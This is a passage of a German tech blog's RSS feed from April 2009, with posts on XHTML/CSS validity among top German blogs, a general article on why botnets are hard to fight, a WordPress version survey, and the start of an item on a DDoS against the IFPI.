		<link>http://feedproxy.google.com/~r/Netzhappen/~3/HvZ0soKwFG4/</link>
		<comments>http://netzhappen.de/2009/04/21/nur-6-der-deutschen-top100-blogs-liefern-gultiges-xhtml/#comments</comments>
		<pubDate>Tue, 21 Apr 2009 20:33:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzhappen]]></category>
		<category><![CDATA[blogs]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[top100]]></category>
		<category><![CDATA[w3c]]></category>
		<category><![CDATA[xhtml]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1543</guid>
		<description><![CDATA[Nach meinen letzten beiden Tests der Top100 Blogs der deutschen Blogcharts zu den Themen Blogsoftware und Web Analytics Software, habe ich dies Mal die entsprechenden Blogs auf gültiges (X)HTML und CSS2 geprüft. Dabei wurde auf den kostenlosen Prüfdienst vom W3C zurückgegriffen um die Startseiten der Blogs zu testen.
Hintergrund
Gültiges (X)HTML und CSS sind kein reiner Selbstzweck. [...]]]></description>
			<content:encoded><![CDATA[<p>Nach meinen letzten beiden Tests der Top100 Blogs der <a href="http://deutscheblogcharts.de/">deutschen Blogcharts</a> zu den Themen <a href="http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/">Blogsoftware</a> und <a href="http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/">Web Analytics Software</a>, habe ich dies Mal die entsprechenden Blogs auf gültiges <a href="http://de.wikipedia.org/wiki/XHTML">(X)HTML</a> und <a href="http://de.wikipedia.org/wiki/Cascading_Style_Sheets">CSS2</a> geprüft. Dabei wurde auf den kostenlosen Prüfdienst vom <a href="http://de.wikipedia.org/wiki/World_Wide_Web_Consortium">W3C</a> zurückgegriffen um die Startseiten der Blogs zu testen.</p>
<h3>Hintergrund</h3>
<p>Gültiges (X)HTML und CSS sind kein reiner Selbstzweck. Damit eine Webseite in den meisten heutzutage benutzten Webbrowsern gleich aussieht, muss man oft ein wenig in die Trickkiste greifen. Um dies zu erreichen ist es oft einfacher, wenn man bei der Programmierung der Webseite beziehungsweise der Templates gültiges (X)HTML verwendet, weil damit in den meisten Bereichen sichergestellt ist, das alle Browser die Webseite halbwegs ähnlich rendern. Das dies nicht immer möglich ist und nicht alle vom W3C festgelegten Standards gleichermaßen unterstützt werden ist zwar klar, aber sollte einen nicht unbedingt abhalten ein wenig auf die Sauberkeit des Quellcodes zu achten. Zwar liegt das Problem oftmals im fremden Code, wie Bannerwerbung, CMS-Plugins oder diverse Javascript-Spielereien, sollte einen aber nicht abhalten ein wenig drauf zu achten.</p>
<h3>Testergebnisse (X)HTML</h3>
<p>Aus den oben angesprochenen Gründen habe ich nicht erwartet das alle Blogs gültiges XHTML liefern und zumindestens zu einem hohe Prozentsatz mit einigen Fehlern pro Blog gerechnet. Das allerdings so gut wie kein Blog gültiges XHTML besitzt hat mich dann aber doch ein wenig überrascht. Nur 6 Blogs sind unter den Top100 die auf fehlerfreien XHTML beruhen. Von 7 Blogs konnte ich keinen Test machen, da der <a href="http://validator.w3.org/">Validator</a> Probleme mit der Zeichenkodierung hatte. Die restlichen 87 Blogs haben allerdings teils weniger gut abgeschnitten. Um den Grad zu beurteilen haben ich eine Einteilung in mehrere Gruppen vorgenommen, je nach Anzahl der festgestellten Fehler:</p>
<p>Sehr gut: 6 Blogs (0 Fehler)<br />
Gut: 10 Blogs (1-10 Fehler)<br />
Befriedigend: 14 Blogs (11-25 Fehler)<br />
Ausreichend: 9 Blogs (26-45 Fehler)<br />
Mangelhaft: 10 Blogs (46-75 Fehler)<br />
Ungenügend: 44 Blogs (ab 76 Fehler)</p>
<div id="attachment_1544" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/04/xhtmlw3c.jpg"><img class="size-medium wp-image-1544" title="Gültiges (X)HTML der Top100 Blogs" src="http://netzhappen.de/wp-content/uploads/2009/04/xhtmlw3c-300x143.jpg" alt="Gültiges (X)HTML der Top100 Blogs" width="300" height="143" /></a><p class="wp-caption-text">Gültiges (X)HTML der Top100 Blogs</p></div>
<p><strong>Erschreckend war dabei das es noch 36 Blogs gibt, welche mehr als 150! Fehler aufweisen und somit alles andere als standardkonform sind.</strong> Ob das im Endeffekt Auswirkungen auf die Darstellung hat sei dahingestellt und muß nicht zwangsläufig der Fall, zumal sich oftmals Folgefehler ergeben die bei Behebung eines einzelnen Fehlers gleich mit aufheben. Aber in diesen Fällen sollten die Blogbetreiber doch einmal nachprüfen ob sich da nicht mit wenigen Kniffen etwas machen läßt.</p>
<h3>Testergebnisse CSS2</h3>
<p>Geprüft wurde auf gültiges CSS in der Version 2, dem defacto Standard. Hier sah es schon deutlich besser aus und Fehler sollten auch ungleich einfacher zu beheben sein, ohne negative Auswirkungen auf das Layout oder Design zu haben. 15 Blogs nutzen hierbei gültiges CSS2, 79 Blogs ungültiges CSS2 und bei 6 Blogs konnte eine Überprüfung aufgrund unterschiedlichster Probleme kein Ergebnis erbringen. Auch hier nahm ich die gleiche Unterteilung in Gruppen wie schon zuvor beim XHTML Test vor. Das Ergbnis ist hier dabei wie folgt:</p>
<p>Sehr gut: 15 Blogs (0 Fehler)<br />
Gut: 52 Blogs (1-10 Fehler)<br />
Befriedigend: 15 Blogs (11-25 Fehler)<br />
Ausreichend: 8 Blogs (26-45 Fehler)<br />
Mangelhaft: 3 Blogs (46-75 Fehler)<br />
Ungenügend: 1 Blog (ab 76 Fehler)</p>
<div id="attachment_1545" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/04/css2w3c.jpg"><img class="size-medium wp-image-1545" title="Gültiges CSS2 der Top100 Blogs" src="http://netzhappen.de/wp-content/uploads/2009/04/css2w3c-300x143.jpg" alt="Gültiges CSS2 der Top100 Blogs" width="300" height="143" /></a><p class="wp-caption-text">Gültiges CSS2 der Top100 Blogs</p></div>
<p>Hier könnten die Blogbetreiber relativ schnell nachbessern und die Fehlerquote runterschrauben. Die Auswirkungen von fehlerhaften CSS sind natürlich geringer und oftmals vernachlässigbar, aber sollten trotz allem nicht außer Acht gelassen werden.</p>
<h3>Verwendete Doctypes</h3>
<p>Auf Anregung habe ich nachträglich noch fix die verwendeten Doctypes untersucht und möchte die Ergebnisse nicht vorenthalten. Ein Großteil nutzt XHTML in Version 1.0. Davon setzt die Mehrheit auf Transitional statt auf Strict. Nur noch sehr selten wird noch die alte HTML 4.0 Version eingesetzt. Vereinzelt finden sich auch schon Blogs in der neueren XHTML 1.1 Version.</p>
<p>XHTML 1.0 Transitional: 75 Blogs<br />
XHTML 1.0 Strict: 17 Blogs<br />
XHTML 1.1: 4 Blogs<br />
HTML 4.0: 2 BLogs</p>
<h3>Fazit</h3>
<p>Gültiges XHTML und CSS nach dem W3C-Standard wird in der Blogosphäre scheinbar noch sehr stiefmütterlich behandelt. Die Auswirkungen können dabei auch sehr unterschiedlich sein und von negativen Konsequenzen wie größeren Problemen in der Darstellung mit Browser X, bis hin zu keinen spürbaren Unterschieden. Wie wichtig einem standardkonformes XHTML und CSS ist, können nur die Blogbetreiber selbst entscheiden. Persönlich würde ich schon drauf achten, allein um es den Besuchern zu erleichtern das Blog in den unterschiedlichsten Browservarianten zu betrachten, obgleich auch gültiges XHTML/CSS absolut kein Allheilmittel ist.</p>
<p><strong>Technisches zur Versionsbestimmung</strong><br />
<em>Um die Blogs auf gültiges XHTML zu überprüfen habe ich die jeweiligen URLs mit ein PHP Batch Script beim Dienst validator.w3c.org (XHTML) und jigsaw.w3.org (CSS) abgefragt. Für die CSS Prüfung wurde dabei ausschließlich auf CSS2 geprüft, da dies eigentlich Standard sein sollte. Teilweise konnten die URLs nicht ausgewertet werden, da der entsprechende Dienst Probleme mit der Adresse hatte. In diesen Fällen wurde noch einmal manuell versucht die Adresse zu prüfen. Die Untersuchung fand am 21. April statt und griff auf die Daten von deutscheblogcharts.de Ausgabe 13/2009 vom 01.04.2009 zurück.</em></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/" rel="bookmark" title="Permanent Link: 71% der deutschen Top100 Blogs nutzen Wordpress">71% der deutschen Top100 Blogs nutzen Wordpress</a></li><li><a href="http://netzhappen.de/2009/01/19/blogsoftware-statistik-der-technorati-top100-blogs/" rel="bookmark" title="Permanent Link: Blogsoftware Statistik der Technorati Top100 Blogs">Blogsoftware Statistik der Technorati Top100 Blogs</a></li><li><a href="http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/" rel="bookmark" title="Permanent Link: 35% der deutschen Top100 Blogs nutzen altes Google Analytics Script">35% der deutschen Top100 Blogs nutzen altes Google Analytics Script</a></li><li><a href="http://netzhappen.de/2008/12/08/verfassungsschutz-greift-nach-dem-bka-gesetz/" rel="bookmark" title="Permanent Link: Verfassungsschutz greift nach dem BKA-Gesetz">Verfassungsschutz greift nach dem BKA-Gesetz</a></li><li><a href="http://netzhappen.de/2009/02/12/eu-sucht-kaufer-fur-nacktscanner/" rel="bookmark" title="Permanent Link: EU sucht Käufer für Nacktscanner">EU sucht Käufer für Nacktscanner</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/-vgj0oj3F34KUjDGpaZ40wCY54g/0/da"><img src="http://feedads.g.doubleclick.net/~a/-vgj0oj3F34KUjDGpaZ40wCY54g/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/-vgj0oj3F34KUjDGpaZ40wCY54g/1/da"><img src="http://feedads.g.doubleclick.net/~a/-vgj0oj3F34KUjDGpaZ40wCY54g/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/HvZ0soKwFG4" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/21/nur-6-der-deutschen-top100-blogs-liefern-gultiges-xhtml/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/21/nur-6-der-deutschen-top100-blogs-liefern-gultiges-xhtml/</feedburner:origLink></item>
		<item>
		<title>4 Gründe warum es immer schwerer wird Botnetze zu bekämpfen</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/PTNpBbiFwoM/</link>
		<comments>http://netzhappen.de/2009/04/21/4-grunde-warum-es-immer-schwerer-wird-botnetze-zu-bekampfen/#comments</comments>
		<pubDate>Tue, 21 Apr 2009 10:43:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzsicherheit]]></category>
		<category><![CDATA[bekämpfung]]></category>
		<category><![CDATA[botnet]]></category>
		<category><![CDATA[botnetz]]></category>
		<category><![CDATA[erkennung]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1538</guid>
		<description><![CDATA[Millionen Computer weltweit sind mit Computerviren infiziert und oftmals Teil von riesigen Botnetzen. Nichtsahnende Benutzer sind damit mitverantwortlich für Spamwellen und andere kriminelle Aktivitäten und stellen ihren Rechner unbewußt unter die Kontrolle der Botnetzbetreiber. Oftmals erreichen solche Botnetze enorme Ausmaße mit hundertausenden von befallenen Computern. Interessant ist dabei der Fakt das sie in vielen Fällen [...]]]></description>
			<content:encoded><![CDATA[<p>Millionen Computer weltweit sind mit Computerviren infiziert und oftmals Teil von riesigen <a href="http://de.wikipedia.org/wiki/Botnet">Botnetzen</a>. Nichtsahnende Benutzer sind damit mitverantwortlich für Spamwellen und andere kriminelle Aktivitäten und stellen ihren Rechner unbewußt unter die Kontrolle der Botnetzbetreiber. Oftmals erreichen solche Botnetze enorme Ausmaße mit hundertausenden von befallenen Computern. Interessant ist dabei der Fakt das sie in vielen Fällen monatelang unentdeckt bleiben und in dieser Zeit ihr Werk unbeeindruckt vollführen können. Durch die stärker werdende Netzanbindung sind immer neue Opfer zu finden und die Zahl an unsicheren Anwendungen, die unter anderem als Einfallstor für Botnetze dienen, nimmt dabei nicht wirklich ab, als Beispiel seien hier die unzähligen Tools zum Verwalten und Bedienen Sozialer Netzwerke angesprochen. Gleichzeitig rüsten die <a href="http://de.wikipedia.org/wiki/Botmaster">Botnetzbetreiber</a> weiter auf und bedienen sich dabei immer cleverer Methoden um unentdeckt und widerstandsfähiger gegen Antivirensoftware zu bleiben.</p>
<p>Hier nun 4 Gründe warum es schwerer wird gegen Botnetze vorzugehen:</p>
<h3>1. Stilles Operieren ohne Aufmerksamkeit zu wecken</h3>
<p>Anders als im aktuellen Fall von <a href="http://de.wikipedia.org/wiki/Conficker">Conficker</a> (Conficker-<a href="http://www.confickerworkinggroup.org/wiki/">Arbeitsgruppe</a>: ca. 4.6 Millionen <a href="http://de.wikipedia.org/wiki/Zombie_%28Internet%29">Zombies</a>) und der damit einhergehenden medialen Berichterstattung operieren viele der größten Botnetze außerhalb des Medienzirkuses. Genau dies ist der Idealfall für die Botnetzbetreiber.</p>
<p>Je weniger über ein Botnetz berichtet wird, umso höher ist die Wahrscheinlichkeit das es unentdeckt für die meisten Computernutzer bleibt. Durch die Conficker-Berichterstattung in den Mainstreammedien hat wahrscheinlich auch der Letzte davon erfahren und zumindestens einmal in seinem Leben das Wort Botnetz beziehungsweise Conficker gehört und kann damit etwas anfangen. Aber fragt man diese zum Beispiel nach Cimbot, wird man mit Sicherheit nur ein Achselzucken zurückbekommen. Cimbot ist eine Malware die benutzt wird um ein weltweites Botnetz zu kreieren das laut aktuellen Studien für 15% des weltweiten Spamvolumens verantwortlich ist.</p>
<p>Sicherheitsexperten haben noch viele andere solcher unscheinbaren Botnetzen auf dem Radar und sehen die Problematik oftmals in den Verschleierungstechniken dieser Software. Viele Botnetze und die damit einhergehenden Trojaner verwenden Techniken wie serverseitigen Polymorphismus durch das sich die Malware ständig selbst leicht ändert um Antivirensoftware zu täuschen und im Kampf um die Erkennungsroutinen die Nase immer ein kleines Stück vorne zu haben. Bekanntes Beispiel dafür ist das Waledac Botnetz.</p>
<p>Gleichzeitig haben die Botnetzbetreiber angefangen ihre Command-and-Control-Server von einer zentralisierten Verwaltung auf eine <a href="http://de.wikipedia.org/wiki/Peer-to-Peer">Peer-To-Peer</a> Architektur umzubauen. Damit ist es noch schwerer geworden den Steuerungskopf solcher Botnetze einfach abzuschalten. <a href="http://de.wikipedia.org/wiki/Conficker">Conficker</a>, <a href="http://de.wikipedia.org/wiki/Storm_Botnet">Storm</a> oder <a href="http://de.wikipedia.org/wiki/Waledac">Waledac</a> profitieren genau von solchen Methoden.</p>
<h3>2. Malware schützt sich selbst</h3>
<p>Die Schreiber von Trojanern und Botznetz verwandter Malware setzen verstärkt auf Kryptographie um es den Sicherheitsfirmen schwerer zu machen. Dabei bedient man sich stärker Verschlüsselungstechniken um zum Beispiel die Command-and-Control-Server zu schützen und zu verschleiern. Früher konnte man diesen Servern noch falsche Anweisungen schicken und sie damit effektiv stören und abstellen. Heute beruhen die Kommandos die hin- und hergeschickt werden auf kryptographischen Befehlen die solch ein Vorgehen deutlich erschweren.</p>
<p>Durch den bereits im ersten Punkt angesprochen Polymorphismus verändern sich <a href="http://de.wikipedia.org/wiki/Computerwurm">Botnetzwürmer</a> von Kopie zu Kopie und machen es Antivirenherstellern ungleich schwerer geeignete Signaturen für die Erkennung zu generieren.</p>
<h3>3. Viele Anwendungen liegen außerhalb der IT-Kontrolle</h3>
<p>Egal wie stark zum Beispiel Firmennetzwerke abgesichert sind, gibt es immer wieder neue Einfallstore durch die <a href="http://de.wikipedia.org/wiki/Computervirus">Viren</a>, <a href="http://de.wikipedia.org/wiki/Trojanisches_Pferd_%28Computerprogramm%29">Trojaner</a> oder <a href="http://de.wikipedia.org/wiki/Computerwurm">Würmer</a> auf Computer eindringen und die entsprechenden Computer in ein Botnetz einreihen. Oftmals sind es Computeranwendungen von Drittanbietern die Sicherheitslücken aufweisen und die außerhalb der Kontrolle der zuständigen Administratoren liegen.</p>
<p>In einer aktuellen Studie von 60 großen Unternehmen mit insgesamt fast 900.000 untersuchten Mitarbeitern sich gezeigt das dort eingesetze Software viele Sicherheitsmaßnahmen umgehen und die Abwehrstruktur der Unternehmensnetze hinfällig werden lassen. Viele Software springt von <a href="http://de.wikipedia.org/wiki/Port_%28Protokoll%29">Port</a> zu Port oder nutzt viele oft standardmäßig freigegeben Ports wie 80 oder 443. Darunter sind so prominente Anwendungen wie Microsoft Sharepoint oder Update-Dienste wie Apple- und Adobe Updateprogramme. Ebenfalls nutzen viele Mitarbeiter Fernwartungssoftware um auf entfernente Rechner zugreifen zu können. Und immer wieder finden sich P2P-Software auf Firmenrechner und machen es bei bekanntwerdenen Sicherheitslücken einfach über diese Viren und ähnliches einzuschleusen.</p>
<p>Die meisten Firmen setzen daher Firewalllösungen ein, aber die Komplexität läßt Lücken entstehen die sofort ausgenutzt werden.</p>
<h3>4. Soziale Netzwerke haben die Angriffsoberfläche vergrößert</h3>
<p>Durch die wachsende Zahl an Menschen die <a href="http://de.wikipedia.org/wiki/Soziales_Netzwerk_%28Informatik%29">Soziale Netzwerke</a> wie Facebook, Twitter oder Myspace nutzen entstehen neue Angriffsvektoren die von Botnetzbetreibern ausgenutzt werden. Da auf solchen Plattformen ein reger Austausch von hochgeladenen Dateien (Fotos, Texte, Musikdateien ect.) stattfindet, landen Viren leicht in Firmennetzwerken und überwinden durch aktives Zutun der Mitarbeiter viele interne Sicherheitsmaßnahmen.</p>
<p>Um dies anzugehen müssen die Mitarbeiter und allgemein Computernutzer für die Problematik sensibilisiert werden. Das geschieht bereits in kleinerem Umfang erreicht aber die große Masse eher selten. Erst durch extreme Fälle wie im Fall von Conficker wird ein breites Publikum durch die Mainstreammedien angesprochen. Um zukünftige Epidemien zu verhindern bedarf es zu einem guten Teil den Nutzer selbst, da Antivirenhersteller und IT-Sicherheitsexperten nur bedingt Einfluß nehmen können.</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/05/15/dubai-hauptstadt-der-botnetze-in-nahost/" rel="bookmark" title="Permanent Link: Dubai, Hauptstadt der Botnetze in Nahost">Dubai, Hauptstadt der Botnetze in Nahost</a></li><li><a href="http://netzhappen.de/2009/01/23/ausnutzung-von-sicherheitslucken-immer-schneller/" rel="bookmark" title="Permanent Link: Ausnutzung von Sicherheitslücken immer schneller">Ausnutzung von Sicherheitslücken immer schneller</a></li><li><a href="http://netzhappen.de/2009/01/19/forscher-erstellt-dateien-mit-fake-microsoft-authenticode%e2%84%a2/" rel="bookmark" title="Permanent Link: Forscher erstellt Dateien mit &#8220;Fake&#8221; Microsoft Authenticode™">Forscher erstellt Dateien mit &#8220;Fake&#8221; Microsoft Authenticode™</a></li><li><a href="http://netzhappen.de/2009/02/26/rumanien-setzt-vorratsdatenspeicherung-bis-ende-2009-aus/" rel="bookmark" title="Permanent Link: Rumanien setzt Vorratsdatenspeicherung bis Ende 2009 aus">Rumanien setzt Vorratsdatenspeicherung bis Ende 2009 aus</a></li><li><a href="http://netzhappen.de/2009/01/14/spam-botnets-ausblick-2009/" rel="bookmark" title="Permanent Link: Spam-Botnets &#8211; Ausblick 2009">Spam-Botnets &#8211; Ausblick 2009</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/7VDKVfdWriKE812gxuffbO6XH60/0/da"><img src="http://feedads.g.doubleclick.net/~a/7VDKVfdWriKE812gxuffbO6XH60/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/7VDKVfdWriKE812gxuffbO6XH60/1/da"><img src="http://feedads.g.doubleclick.net/~a/7VDKVfdWriKE812gxuffbO6XH60/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/PTNpBbiFwoM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/21/4-grunde-warum-es-immer-schwerer-wird-botnetze-zu-bekampfen/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/21/4-grunde-warum-es-immer-schwerer-wird-botnetze-zu-bekampfen/</feedburner:origLink></item>
		<item>
		<title>71% der deutschen Top100 Blogs nutzen Wordpress</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/aG12YDjFwx0/</link>
		<comments>http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 16:41:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzhappen]]></category>
		<category><![CDATA[blogcharts]]></category>
		<category><![CDATA[blogs]]></category>
		<category><![CDATA[blogsoftware]]></category>
		<category><![CDATA[top100]]></category>
		<category><![CDATA[versionen]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1529</guid>
		<description><![CDATA[Nach der letzten Studie zur Nutzung der Web Analytics Software der Top100 Blogs von deutscheblogcharts.de, habe ich dieses Mal die benutzte Blogsoftware untersucht. Dabei kam es fast zu den von mir erwarteten Ergebnissen, allerdings war ich auch von einigen Resultaten überrascht. Spannend war vor allem die Auswertung der Wordpress-Blogs, da ich dort einen Blick auf [...]]]></description>
			<content:encoded><![CDATA[<p>Nach der letzten Studie zur <a href="http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/">Nutzung der Web Analytics Software</a> der Top100 Blogs von <a href="http://www.deutscheblogcharts.de">deutscheblogcharts.de</a>, habe ich dieses Mal die benutzte Blogsoftware untersucht. Dabei kam es fast zu den von mir erwarteten Ergebnissen, allerdings war ich auch von einigen Resultaten überrascht. Spannend war vor allem die Auswertung der Wordpress-Blogs, da ich dort einen Blick auf die benutzten Versionen geworfen hatte.</p>
<h3>Ergebnis der Untersuchung</h3>
<p>Mit überraschend deutlichen Abstand wird von den deutschen Top100 Blogs die Software <a href="http://wordpress.org/">Wordpress</a> eingesetzt. Von den untersuchten Seiten nutzen sage und schreibe 71 Wordpress und verdeutlichen damit die Monopolstellung dieser Software. Weit abgeschlagen liegt auf Platz 2 <a href="http://www.s9y.org/">Serendipity</a> mit 5 Blogs und auf Platz 3 <a href="http://code.google.com/p/antville/">Antville</a>, die in diesem Fällen von den Blogplattformen blogger.de und twoday.de eingesetzt wird. Fast kaum wird hierzulande dagegen <a href="http://www.typepad.com/">Typepad</a>, <a href="http://drupal.org/">Drupal</a> oder <a href="http://lifetype.net/">Lifetype</a> eingesetzt. Am Ende der Reihe finden sich dann noch einige Exoten wie ExpressionEngine, Frontier Kernel Project, eZ publish, Community Server oder Blogs die auf der Plattform blogger.com gehostet werden. Von insgesamt 7 Blogs konnte eine kurze Überpüfung der Seite nicht aufzeigen welche Software eingesetzt wird. Mindestens 1 Blog nutzt eine Eigenkreation.</p>
<div id="attachment_1530" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/04/blogsoftware.jpg"><img class="size-medium wp-image-1530" title="Blogsoftware der Top100 Blogs" src="http://netzhappen.de/wp-content/uploads/2009/04/blogsoftware-300x178.jpg" alt="Blogsoftware der Top100 Blogs" width="300" height="178" /></a><p class="wp-caption-text">Blogsoftware der Top100 Blogs</p></div>
<h3>Wordpress im Detail</h3>
<p>Da der deutlich größte Anteil auf Wordpress fällt, lohnte sich hier eine Überprüfung der einzeln eingesetzten Versionen. Da die neue Wordpress-Version 2.8 in Kürze freigegeben wird, vielleicht für den ein oder anderen Blog Zeit über die eigene Update-Politik nachzudenken.</p>
<p>Vorneweg gesagt, die Mehrheit setzt die aktuellste Version 2.7.1 ein, dicht gefolgt von einen noch relativ hohen Anteil an Version 2.7, was aber kein größes Problem darstellt, da seitdem keine kritischen Sicherheitslücken bekannt sind. Interessant fand ich aber das doch verhältnismäßig viele Blogs auf teils doch sehr veraltete Versionen setzen. Erklären kann ich mir das eigentlich nur bedingt. Vielleicht ist das Layout beziehungsweise die Templates nicht mit neueren Versionen kompatibel oder aber die Webseite wird extern gewartet, das allerdings schlecht. Aber vielleicht ist das den entsprechenden Betreibern auch alles egal. Jedenfalls finden sich unter den Top100 noch so Relikte wie 2.0.x, 2.3.x und viele 2.6.x Versionen. Die sich angesprochenen Blogs könnten ja mal drüber nachdenken auf die bald erscheinende 2.8er zu wechseln. Allein aus Sicherheitsaspekten keine schlechte Wahl.</p>
<div id="attachment_1531" class="wp-caption aligncenter" style="width: 310px"><a href="http://netzhappen.de/wp-content/uploads/2009/04/wordpressversionen.jpg"><img class="size-medium wp-image-1531" title="Wordpressversionen der Top100 Blogs" src="http://netzhappen.de/wp-content/uploads/2009/04/wordpressversionen-300x157.jpg" alt="Wordpressversionen der Top100 Blogs" width="300" height="157" /></a><p class="wp-caption-text">Wordpressversionen der Top100 Blogs</p></div>
<h3>Fazit</h3>
<p>Die nackten Zahlen sprechen für sich und es läßt sich feststellen das Wordpress unangefochtener Liebling der deutschen Blogosphäre ist und wohl auch die nächste Zeit bleiben wird. Mit Version 2.8 kommt demnächst eine neue Version heraus und vielleicht werden dann auch einige alte Versionen durch diese neue ersetzt. Andere Blogsoftware fällt eigentlich bis auf Serendipity oder Antville komplett aus dem Raster und scheint irrelevant.</p>
<p><strong>Technisches zur Versionsbestimmung</strong><br />
<em>Um die Wordpress Versionen zu bestimmen habe ich hauptsächlich im Quellcode der Blogstartseite nachgeschaut um Hinweise zu bekommen. Ob der dort angegebene Versionswert jedesmal mit dem wirklichen Wert übereinstimmt, läßt sich kaum sagen, sollte aber im Normalfall korrekte Werte liefern. In Fällen wo sich damit keine Version bestimmen ließ, habe ich die Wordpress Version unter unbekannt vermerkt. Die Unterschung fand am 20. April statt und griff auf die Daten von deutscheblogcharts.de Ausgabe 15/2009 vom 15.04.2009 zurück .</em></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://netzhappen.de/2009/01/19/blogsoftware-statistik-der-technorati-top100-blogs/" rel="bookmark" title="Permanent Link: Blogsoftware Statistik der Technorati Top100 Blogs">Blogsoftware Statistik der Technorati Top100 Blogs</a></li><li><a href="http://netzhappen.de/2009/04/21/nur-6-der-deutschen-top100-blogs-liefern-gultiges-xhtml/" rel="bookmark" title="Permanent Link: Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML">Nur 6% der deutschen Top100 Blogs liefern gültiges (X)HTML</a></li><li><a href="http://netzhappen.de/2009/04/08/35-der-deutschen-top100-blogs-nutzen-altes-google-analytics-script/" rel="bookmark" title="Permanent Link: 35% der deutschen Top100 Blogs nutzen altes Google Analytics Script">35% der deutschen Top100 Blogs nutzen altes Google Analytics Script</a></li><li><a href="http://netzhappen.de/2009/03/24/die-zuverlassigsten-blog-dienste/" rel="bookmark" title="Permanent Link: Die zuverlässigsten Blog-Dienste">Die zuverlässigsten Blog-Dienste</a></li><li><a href="http://netzhappen.de/2008/12/10/upgrade-neues-theme/" rel="bookmark" title="Permanent Link: (Sticky) Upgrade + neues Theme">(Sticky) Upgrade + neues Theme</a></li></ul><hr /><small>Copyright &copy; 2009 Creative Commons (by-sa 3.0 de)<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:  603cc2c207abcf396f861a9a7ec0ad7a)</small>
<p><a href="http://feedads.g.doubleclick.net/~a/iCL7Zwkns5pm3i6D3rTRh2vEIrI/0/da"><img src="http://feedads.g.doubleclick.net/~a/iCL7Zwkns5pm3i6D3rTRh2vEIrI/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/iCL7Zwkns5pm3i6D3rTRh2vEIrI/1/da"><img src="http://feedads.g.doubleclick.net/~a/iCL7Zwkns5pm3i6D3rTRh2vEIrI/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/Netzhappen/~4/aG12YDjFwx0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<feedburner:origLink>http://netzhappen.de/2009/04/20/71-der-deutschen-top100-blogs-nutzen-wordpress/</feedburner:origLink></item>
		<item>
		<title>DDoS Angriff gegen Weltverband der Musikindustrie</title>
		<link>http://feedproxy.google.com/~r/Netzhappen/~3/8TLZBt5errE/</link>
		<comments>http://netzhappen.de/2009/04/20/ddos-angriff-gegen-weltverband-der-musikindustrie/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 11:39:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Netzpolitik]]></category>
		<category><![CDATA[anonymous]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[ifpi]]></category>
		<category><![CDATA[the pirate bay]]></category>
		<category><![CDATA[tpb]]></category>
		<category><![CDATA[verdict]]></category>

		<guid isPermaLink="false">http://netzhappen.de/?p=1526</guid>
